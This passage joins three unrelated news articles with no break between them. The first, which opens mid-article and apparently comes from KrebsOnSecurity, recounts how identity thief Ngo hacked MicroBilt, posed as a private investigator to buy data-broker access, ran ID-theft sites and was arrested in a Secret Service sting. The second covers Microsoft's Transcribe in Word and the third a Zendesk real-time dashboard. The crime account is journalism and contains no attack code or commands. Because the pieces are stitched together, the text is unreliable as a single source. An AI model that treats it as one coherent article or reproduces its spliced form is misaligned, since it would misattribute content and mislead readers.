Ngo’s businesses enabled an entire generation of cybercriminals to commit an estimated $1 billion worth of new account fraud, and to sully the credit histories of countless Americans in the process.

“I don’t know of any other cybercriminal who has caused more material financial harm to more Americans than Ngo,” O’Neill told KrebsOnSecurity. “He was selling the personal information on more than 200 million Americans and allowing anyone to buy it for pennies apiece.”

Freshly released from the U.S. prison system and deported back to Vietnam, Ngo is currently finishing up a mandatory three-week COVID-19 quarantine at a government-run facility. He contacted KrebsOnSecurity from inside this facility with the stated aim of telling his little-known story, and to warn others away from following in his footsteps.

BEGINNINGS

Ten years ago, then 19-year-old hacker Ngo was a regular on the Vietnamese-language computer hacking forums. Ngo says he came from a middle-class family that owned an electronics store, and that his parents bought him a computer when he was around 12 years old. From then on out, he was hooked.

In his late teens, he traveled to New Zealand to study English at a university there. By that time, he was already an administrator of several dark web hacker forums, and between his studies he discovered a vulnerability in the school’s network that exposed payment card data.

“I did contact the IT technician there to fix it, but nobody cared so I hacked the whole system,” Ngo recalled. “Then I used the same vulnerability to hack other websites. I was stealing lots of credit cards.”

Ngo said he decided to use the card data to buy concert and event tickets from Ticketmaster, and then sell the tickets at a New Zealand auction site called TradeMe. The university later learned of the intrusion and Ngo’s role in it, and the Auckland police got involved. Ngo’s travel visa was not renewed after his first semester ended, and in retribution he attacked the university’s site, shutting it down for at least two days.

Ngo said he started taking classes again back in Vietnam, but soon found he was spending most of his time on cybercrime forums.

“I went from hacking for fun to hacking for profits when I saw how easy it was to make money stealing customer databases,” Ngo said. “I was hanging out with some of my friends from the underground forums and we talked about planning a new criminal activity.”

“My friends said doing credit cards and bank information is very dangerous, so I started thinking about selling identities,” Ngo continued. “At first I thought well, it’s just information, maybe it’s not that bad because it’s not related to bank accounts directly. But I was wrong, and the money I started making very fast just blinded me to a lot of things.”

MICROBILT

His first big target was a consumer credit reporting company in New Jersey called MicroBilt.

“I was hacking into their platform and stealing their customer database so I could use their customer logins to access their [consumer] databases,” Ngo said. “I was in their systems for almost a year without them knowing.”

Very soon after gaining access to MicroBilt, Ngo says, he stood up Superget[.]info, a website that advertised the sale of individual consumer records. Ngo said initially his service was quite manual, requiring customers to request specific states or consumers they wanted information on, and he would conduct the lookups by hand.

Ngo’s former identity theft service, superget[.]info

“I was trying to get more records at once, but the speed of our Internet in Vietnam then was very slow,” Ngo recalled. “I couldn’t download it because the database was so huge. So I just manually search for whoever need identities.”

But Ngo would soon work out how to use more powerful servers in the United States to automate the collection of larger amounts of consumer data from MicroBilt’s systems, and from other data brokers. As I wrote of Ngo’s service back in November 2011:

“Superget lets users search for specific individuals by name, city, and state. Each “credit” costs USD$1, and a successful hit on a Social Security number or date of birth costs 3 credits each. The more credits you buy, the cheaper the searches are per credit: Six credits cost $4.99; 35 credits cost $20.99, and $100.99 buys you 230 credits. Customers with special needs can avail themselves of the “reseller plan,” which promises 1,500 credits for $500.99, and 3,500 credits for $1000.99.

“Our Databases are updated EVERY DAY,” the site’s owner enthuses. “About 99% nearly 100% US people could be found, more than any sites on the internet now.”

Ngo’s intrusion into MicroBilt eventually was detected, and the company kicked him out of their systems. But he says he got back in using another vulnerability.

“I was hacking them and it was back and forth for months,” Ngo said. “They would discover [my accounts] and fix it, and I would discover a new vulnerability and hack them again.”

COURT (AD)VENTURES, AND EXPERIAN

This game of cat and mouse continued until Ngo found a much more reliable and stable source of consumer data: A U.S. based company called Court Ventures, which aggregated public records from court documents. Ngo wasn’t interested in the data collected by Court Ventures, but rather in its data sharing agreement with a third-party data broker called U.S. Info Search, which had access to far more sensitive consumer records.

Using forged documents and more than a few lies, Ngo was able to convince Court Ventures that he was a private investigator based in the United States.

“At first [when] I sign up they asked for some documents to verify,” Ngo said. “So I just used some skill about social engineering and went through the security check.”

Then, in March 2012, something even more remarkable happened: Court Ventures was purchased by Experian, one of the big three major consumer credit bureaus in the United States. And for nine months after the acquisition, Ngo was able to maintain his access.

“After that, the database was under control by Experian,” he said. “I was paying Experian good money, thousands of dollars a month.”

Whether anyone at Experian ever performed due diligence on the accounts grandfathered in from Court Ventures is unclear. But it wouldn’t have taken a rocket surgeon to figure out that this particular customer was up to something fishy.

For one thing, Ngo paid the monthly invoices for his customers’ data requests using wire transfers from a multitude of banks around the world, but mostly from new accounts at financial institutions in China, Malaysia and Singapore.

O’Neill said Ngo’s identity theft website generated tens of thousands of queries each month. For example, the first invoice Court Ventures sent Ngo in December 2010 was for 60,000 queries. By the time Experian acquired the company, Ngo’s service had attracted more than 1,400 regular customers, and was averaging 160,000 monthly queries.

More importantly, Ngo’s profit margins were enormous.

“His service was quite the racket,” O’Neill said. “Court Ventures charged him 14 cents per lookup, but he charged his customers about $1 for each query.”

By this time, O’Neill and his fellow Secret Service agents had served dozens of subpoenas tied to Ngo’s identity theft service, including one that granted them access to the email account he used to communicate with customers and administer his site. The agents discovered several emails from Ngo instructing an accomplice to pay Experian using wire transfers from different Asian banks.

TLO

Working with the Secret Service, Experian quickly zeroed in on Ngo’s accounts and shut them down. Aware of an opportunity here, the Secret Service contacted Ngo through an intermediary in the United Kingdom — a known, convicted cybercriminal who agreed to play along. The U.K.-based collaborator told Ngo he had personally shut down Ngo’s access to Experian because he had been there first and Ngo was interfering with his business.

“The U.K. guy told Ngo, ‘Hey, you’re treading on my turf, and I decided to lock you out. But as long as you’re paying a vig through me, your access won’t go away’,” O’Neill recalled.

The U.K. cybercriminal, acting at the behest of the Secret Service and U.K. authorities, told Ngo that if he wanted to maintain his access, he could agree to meet up in person. But Ngo didn’t immediately bite on the offer.

Instead, he weaseled his way into another huge data store. In much the same way he’d gained access to Court Ventures, Ngo got an account at a company called TLO, another data broker that sells access to extremely detailed and sensitive information on most Americans.

TLO’s service is accessible to law enforcement agencies and to a limited number of vetted professionals who can demonstrate they have a lawful reason to access such information. In 2014, TLO was acquired by Trans Union, one of the other three big U.S. consumer credit reporting bureaus.

And for a short time, Ngo used his access to TLO to power a new iteration of his business — an identity theft service rebranded as usearching[.]info. This site also pulled consumer data from a payday loan company that Ngo hacked into, as documented in my Sept. 2012 story, ID Theft Service Tied to Payday Loan Sites. Ngo said the hacked payday loans site gave him instant access to roughly 1,000 new fullz records each day.

Ngo’s former ID theft service usearching[.]info.

BLINDED BY GREED

By this time, Ngo was a multi-millionaire: His various sites and reselling agreements with three Russian-language cybercriminal stores online had earned him more than USD $3 million. He told his parents his money came from helping companies develop websites, and even used some of his ill-gotten gains to pay off the family’s debts (its electronics business had gone belly up, and a family member had borrowed but never paid back a significant sum of money).

But mostly, Ngo said, he spent his money on frivolous things, although he says he’s never touched drugs or alcohol.

“I spent it on vacations and cars and a lot of other stupid stuff,” he said.

When TLO locked Ngo out of his account there, the Secret Service used it as another opportunity for their cybercriminal mouthpiece in the U.K. to turn the screws on Ngo yet again.

“He told Ngo he’d locked him out again, and that he could do this all day long,” O’Neill said. “And if he truly wanted lasting access to all of these places he used to have access to, he would agree to meet and form a more secure partnership.”

After several months of conversing with his apparent U.K.-based tormentor, Ngo agreed to meet him in Guam to finalize the deal. Ngo says he understood at the time that Guam is an unincorporated territory of the United States, but that he discounted the chances that this was all some kind of elaborate law enforcement sting operation.

“I was so desperate to have a stable database, and I got blinded by greed and started acting crazy without thinking,” Ngo said. “Lots of people told me ‘Don’t go!,’ but I told them I have to try and see what’s going on.”

But immediately after stepping off of the plane in Guam, he was apprehended by Secret Service agents.

“One of the names of his identity theft services was findget[.]me,” O’Neill said. “We took that seriously, and we did like he asked.”

This is Part I of a multi-part series. Check back tomorrow (Aug. 27) for Part II, which will examine what investigators learned following Ngo’s arrest, and delve into his more recent effort to right the wrongs he’s done.

Microsoft brings transcriptions to Word

Microsoft today launched Transcribe in Word, its new transcription service for Microsoft 365 subscribers, into general availability. It’s now available in the online version of Word, with other platforms launching later. In addition, Word is also getting new dictation features, which now allow you to use your voice to format and edit your text, for example.

As the name implies, this new feature lets you transcribe conversations, both live and pre-recorded, and then edit those transcripts right inside of Word. With this, the company goes head-to-head with startups like Otter and Google’s Recorder app, though they all have their own pros and cons.

To get started with Transcribe in Word, you simply head for the Dictate button in the menu bar and click on “Transcribe.” From there, you can record a conversation as it happens — by recording it directly through a speakerphone and your laptop’s microphone, for example — or by recording it in some other way and then uploading that file. The service accepts .mp3, .wav, .m4a and .mp4 files.

As Dan Parish, Microsoft principal group PM manager for Natural User Interface & Incubation, noted in a press briefing ahead of today’s announcement, when you record a call live, the transcription actually runs in the background while you conduct your interview, for example. The team purposely decided not to show you the live transcript, though, because its user research showed that it was distracting. I admit that I like to see the live transcript in Otter and Recorder, but maybe I’m alone in that.

Like with other services, Transcribe in Word lets you click on individual paragraphs in the transcript and then listen to that at a variety of speeds. Because the automated transcript will inevitably have errors in it, that’s a must-have feature. Sadly, though, Transcribe doesn’t let you click on individual words.

One major limitation of the service right now is that if you like to record offline and then upload your files, you’ll be limited to 300 minutes, without the ability to extend this for an extra fee, for example. I know I often transcribe far more than five hours of interviews in any given month, so that limit seems low, especially given that Otter provides me with 6,000 minutes on its cheapest paid plan. The max length for a transcript on Otter is four hours, while Microsoft’s only limit is a 200MB file upload limit, with no limits on live recordings.

Another issue I noticed here is that if you mistakenly exit the tab with Word in it, the transcription process will stop and there doesn’t seem to be a way to restart it.

It also takes quite a while for the uploaded files to be transcribed. It takes roughly as long as the conversations I’ve tried to transcribe, but the results are very good — and often better than those of competing services. Transcribe for Word also does a nice job separating out the different speakers in a conversation. For privacy reasons, you must assign your own names to those — even when you regularly record the same people.

It’d be nice to get the same feature in something like OneNote, for example, and my guess is Microsoft may expand this to its note-taking app over time. To me, that’s the more natural place for it.

The new dictation features in Word now let you give commands like “bold the last sentence,” for example, and say “percentage sign” or “ampersand” if you need to add those symbols to a text (or “smiley face,” if those are the kinds of texts you write in Word).

Even if you don’t often need to transcribe text, this new feature shows how Microsoft is now using its subscription service to launch new premium features to convert free users to paying ones. I’d be surprised if tools like the Microsoft Editor (which offers more features for paying users), this transcription service, as well as some of the new AI features in the likes of Excel and PowerPoint, didn’t help to convert some users into paying ones, especially now that the company has combined Office 365 and Microsoft 365 for consumers into a single bundle. After all, just a subscription to something like Grammarly and Otter would be significantly more expensive than a Microsoft 365 subscription.

New Zendesk dashboard delivers customer service data in real time

Zendesk has been offering customers the ability to track customer service statistics for some time, but it has always been a look back. Today, the company announced a new product called Explore Enterprise that lets customers capture that valuable info in real time, and share it with anyone in the organization, whether they have a Zendesk license or not.

While it has had Explore in place for a couple of years now, Jon Aniano, senior VP of product at Zendesk, says the new enterprise product is in response to growing customer data requirements. “We now have a way to deliver what we call Live Team Dashboards, which delivers real-time analytics directly to Zendesk users,” Aniano told TechCrunch.

In the days before COVID that meant displaying these on big monitors throughout the customer service center. Today, as we deal with the pandemic, and customer service reps are just as likely to be working from home, it means giving management the tools they need to understand what’s happening in real time, a growing requirement for Zendesk customers as they scale, regardless of the pandemic.

“What we’ve found over the last few years is that our customers’ appetite for operational analytics is insatiable, and as customers grow, as customer service needs get more complex, the demands on a contact center operator or customer service team are higher and higher, and teams really need new sets of tools and new types of capabilities to meet what they’re trying to do in delivering customer service at scale in the world,” Aniano told TechCrunch.

One of the reasons for this is the shift from phone and email as the primary ways of accessing customer service to messaging tools like WhatsApp. “With the shift to messaging, there are new demands on contact centers to be able to handle real-time interactions at scale with their customers,” he said.

Meeting that kind of demand requires real-time analytics, which Zendesk is providing with this announcement. This arms managers with the data they need to put their customer service resources where they are needed most in the moment.

But Zendesk is also giving customers the ability to share these statistics with anyone in the company. “Users can share a dashboard or historical report with anybody in the company regardless of whether they have access to Zendesk. They can share it in Slack, or they can embed a dashboard anywhere where other people in the company would like to have access to those metrics,” Aniano explained.

The new service will be available starting on August 31 for $29 per user per month.